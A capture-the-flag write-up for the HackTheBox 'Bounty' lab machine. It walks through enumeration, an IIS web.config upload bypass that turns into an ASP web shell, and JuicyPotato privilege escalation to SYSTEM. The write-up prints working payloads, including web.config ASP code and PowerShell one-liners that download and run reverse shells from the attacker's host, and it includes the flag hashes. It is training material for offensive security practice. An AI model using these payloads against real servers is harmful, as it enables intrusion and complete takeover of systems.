HackTheBox Bounty
Writeup for HackTheBox Bounty
Machine Synopsis
Bounty is an easy to medium difficulty machine, which features an interesting technique to bypass file uploader protections and achieve code execution. This machine also highlights the importance of keeping systems updated with the latest security patches. (Source)
Key exploitation techniques:
- IIS file upload bypass (ASP
web.config
execution) - Remote Code Execution (RCE) via web shell
SeImpersonatePrivilege
abuse viaJuicyPotato.exe
for SYSTEM acc
Enumeration
1
2
3
4
5
6
7
8
$ nmap -sC -sV 10.10.10.93
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
The scan identified an IIS 7.5 web server on port 80.
gobuster
was used for directory enumeration.
1
2
3
4
5
$ gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -x php,js,html,txt,aspx
...
/transfer.aspx (Status: 200) [Size: 941]
/UploadedFiles (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
...
The /transfer.aspx
page was identified as a file upload interface. Initial testing showed it only allowed specific file types (e.g., .png
). The /UploadedFiles/
directory was also discovered.
Further enumeration (e.g., using Burp Intruder) revealed that .config
files were permitted for upload, among others (gif
, jpg
, png
, doc
, jpeg
, xls
, xlsx
, docx
).
Research into “web.config bypass upload restrictions” revealed that IIS can be configured to execute .config
files as ASP if specific handlers are enabled. A simple ASP payload was used to test this.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
This crafted web.config
file was uploaded via /transfer.aspx
. Accessing http://10.10.10.93/uploadedfiles/web.config
displayed 3
, confirming successful ASP code execution.
Exploitation
ASP Web Shell for RCE (merlin)
A PowerShell reverse shell (revshell.ps1
) from Nishang was prepared and hosted on a local HTTP server.
1
2
3
4
5
$ cat revshell.ps1
function Invoke-PowerShellTcp {
# ... (Nishang's Invoke-PowerShellTcp function) ...
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.23 -Port 1234
A malicious web.config
was then crafted to download and execute this PowerShell script.
1
2
3
4
5
6
7
8
9
10
11
$ cat web.config
...
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
Set shell = CreateObject("WScript.Shell")
Set cmd = shell.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.23:6969/revshell.ps1')")
Set output = cmd.StdOut.Readall()
Response.write(output)
%>
-->
A Python HTTP server was started to host revshell.ps1
. A netcat
listener was set up.
1
2
3
4
5
6
7
# On attacker, host revshell.ps1
$ python3 -m http.server 6969
Serving HTTP on 0.0.0.0 port 6969 (http://0.0.0.0:6969/) ...
# On attacker, set up Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
The malicious web.config
was uploaded via /transfer.aspx
. Accessing http://10.10.10.93/uploadedfiles/web.config
triggered the reverse shell.
1
2
3
4
5
6
7
8
9
10
# HTTP server log
10.10.10.93 - - [08/Jul/2022 21:45:34] "GET /revshell.ps1 HTTP/1.1" 200 -
# Netcat listener
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
This granted a reverse shell as bounty\merlin
.
Privilege Escalation
SeImpersonatePrivilege
Abuse (SYSTEM) via JuicyPotato
Initial system enumeration with systeminfo
revealed Windows Server 2008 R2 Datacenter. whoami /priv
showed SeImpersonatePrivilege
was enabled.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\windows\system32\inetsrv> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
...
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
...
The SeImpersonatePrivilege
is exploitable by tools like JuicyPotato.exe
(or its modern successor, PrintSpoofer
/RoguePotato
for newer Windows versions, but JuicyPotato
is appropriate for 2008 R2). JuicyPotato.exe
was downloaded locally and hosted on the attacking machine.
1
2
3
4
5
6
# On attacker, download JuicyPotato.exe
$ wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
# On attacker, host JuicyPotato.exe
$ python3 -m http.server 6969
Serving HTTP on 0.0.0.0 port 6969 (http://0.0.0.0:6969/) ...
From the merlin
shell, JuicyPotato.exe
was downloaded to C:\Users\merlin\Desktop\jp.exe
.
1
2
PS C:\windows\system32\inetsrv>cd c:\users\merlin\desktop
PS C:\users\merlin\desktop> (new-object net.webclient).downloadfile('http://10.10.14.23:6969/JuicyPotato.exe', 'C:\Users\merlin\Desktop\jp.exe')
A new PowerShell reverse shell (revshell2.ps1
) was prepared and hosted locally.
1
2
3
4
5
6
$ cat revshell2.ps1
...
function Invoke-PowerShellTcp {
# ... (Nishang's Invoke-PowerShellTcp function) ...
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.23 -Port 9999
An exploit.bat
file was created to execute this reverse shell.
1
2
$ cat exploit.bat
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.23:6969/revshell2.ps1')
The exploit.bat
and revshell2.ps1
files were hosted on the attacking machine. A netcat
listener was set up for the new shell.
1
2
3
4
5
6
7
# On attacker, host exploit.bat and revshell2.ps1
$ python3 -m http.server 6969
Serving HTTP on 0.0.0.0 port 6969 ([http://0.0.0.0:6969/](http://0.0.0.0:6969/)) ...
# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
From the merlin
shell, exploit.bat
was downloaded. JuicyPotato.exe
was then executed to launch exploit.bat
with NT AUTHORITY\SYSTEM
privileges.
1
2
3
4
5
6
7
8
PS C:\users\merlin\desktop> (new-object net.webclient).downloadfile('[http://10.10.14.23:6969/exploit.bat](http://10.10.14.23:6969/exploit.bat)', 'C:\Users\merlin\Desktop\exploit.bat')
PS C:\users\merlin\desktop> .\jp.exe -t * -p exploit.bat -l 9696
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 9696
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
The netcat
listener caught the SYSTEM shell.
1
2
3
4
5
6
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.93] 49177
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
The user.txt
and root.txt
flags were retrieved.
1
2
3
4
5
PS C:\Windows\system32> type c:\users\merlin\desktop\user.txt
06831fefdd281c825b6ba52e51ac5a26
PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt
d4ad739f4a8199ffea3b1149e40c121f